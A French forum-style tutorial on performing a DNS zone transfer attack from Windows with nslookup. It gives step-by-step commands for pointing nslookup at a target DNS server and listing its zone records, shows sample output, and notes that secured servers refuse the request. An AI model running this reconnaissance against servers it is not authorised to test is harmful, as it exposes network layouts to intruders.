Comment l'utiliser (exploiter sur Windows) ?



La théorie:


Une attaque de base de transfert de zone DNS n'est pas très compliquée, il suffit de vous prétendre en tant qu' esclave, demander au DNS Maître une copie des enregistrements des DNS , et il vous envoie tout simplement.

La pratique

1) Lancez votre invite de commande (cmd) en tant qu'administrateur.

2) écrivez
Spoiler:
nslookup


Si vous voulez la syntaxe à respecter pour nslookup :
Spoiler:
nslookup [-option] [hostname] [server]  


ensuite vous allez avoir un affichage comme celui ci:
Spoiler:
 C:\> nslookup
   Default Server:  nameserver1.domain.com
   Address:  10.0.0.1
   >


3) vous pouvez à présent changer l'ip du serveur (Default Server) en écrivant ceci:

Spoiler:
server 8.8.8.8


("8.8.8.8" est un exemple, vous devez y inscrire l'ip du DNS Que vous voulez cibler).

Oui mais comment faire pour obtenir l'ip du serveur qui se cache derrière le DNS?

simple (si il est pas protégé par CloudFlare), tapez dans votre cmd

Spoiler:
ping (dns que vous voulez cibler)


Continuons dans l'exploitation de cette faille (après le point 3) vous pouvez donc lister (si le DNS l'autorise bien sur) tout les DNS qui sont enregistré sur le DNS maître.

4) Pour lister les DNS Il suffit d'écrire:

Spoiler:
 ls google.com 


Je me répète bien sur, "google.com" est qu'un exemple.

5) Vous obtiendrez un affichage sur votre CMD similaire à celui-ci:
Spoiler:
   >ls domain.com
   [nameserver1.domain.com]
    nameserver1.domain.com.    NS     server = ns1.domain.com
    nameserver2.domain.com                 NS     server = ns2.domain.com
    nameserver1                            A      10.0.0.1
    nameserver2                            A      10.0.0.2

   >


Les transferts de zone peuvent être bloqués au niveau du serveur DNS de sorte que seuls les réseaux ou les adresses autorisés puissent exécuter cette fonction. L'erreur suivante est renvoyée si la sécurité de la zone a été définie :

Spoiler:
 *** Impossible de fournir la liste du domaine exemple.com. : Requête refusée


Pour plus d'information sur toutes les options disponible pour l'outil nslookup de windows je vous conseil d'écrire "help" après d'y avoir inscrit "nslookup"

et sinon la doc de Windows est : ici